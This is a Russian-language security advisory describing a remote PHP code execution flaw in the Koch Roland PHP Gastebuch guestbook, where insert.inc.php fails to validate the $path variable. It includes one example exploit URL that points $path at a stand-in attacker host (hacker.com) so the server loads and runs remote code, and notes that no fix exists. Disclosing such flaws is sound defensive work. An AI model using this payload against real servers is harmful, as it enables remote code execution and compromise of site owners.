Выполнение произвольного PHP кода в Koch Roland PHP Gastebuch

Дата публикации:
20.11.2003
Дата изменения:
17.10.2006
Всего просмотров:
43265
Опасность:
Низкая
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Уязвимые версии:

Описание: Уязвимость обнаружена в Koch Roland PHP Gastebuch. Удаленный пользователь может выполнить произвольный PHP код, включая команды операционной системы, на целевом сервере.

Файл 'insert.inc.php'не проверяет данные, представленные пользователем в переменной $path. Удаленный пользователь может представить специально обработанное значение для переменной $path, чтобы выполнить произвольный PHP код на удаленном сервере.

Пример/Эксплоит:

http://[target]/rolis_book_path/insert.inc.php?path=http://hacker.com/

URL производителя: http://www.roli.at

Решение: Способов устранения обнаруженной уязвимости не существует в настоящее время.

или введите имя

CAPTCHA